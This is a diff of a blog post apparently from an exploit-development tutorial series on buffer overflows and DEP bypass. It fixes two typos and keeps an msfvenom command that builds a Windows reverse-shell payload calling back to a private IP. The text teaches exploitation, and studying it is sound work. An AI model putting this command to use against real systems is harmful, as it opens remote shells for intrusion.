memN0ps/memN0ps.github.io/_posts/2020-10-12-Stack-Based-Buffer-Overflows-DEP-Part-4.md

 After modifying and sending the exploit, we hit our breakpoint after a series of \x90's (NOPs), which means it worked :) We execute the breakpoint that was placed on the stack.
 We made the stack executable!

-You can place anything after the ROP chain, such as `\xcc`, which is a breakpoint or `\x90's` or even your shellc
+You can place anything after the ROP chain, such as `\xcc`, which is a breakpoint or `\x90's` or even your shellcode.

 ![StackExecutable.png](/images/2020-10-12-Stack-Based-Buffer-Overflows-DEP-Part-4/ad2bd7af55e746938d2cc7078f457fef.png)

-To geenerate a reverse shell, you can use the following:
+To generate a reverse shell, you can use the following:

 `msfvenom -p windows/shell_reverse_tcp LHOST=192.168.16.128 LPORT=443 EXITFUNC=thread -b '\x00' -f c`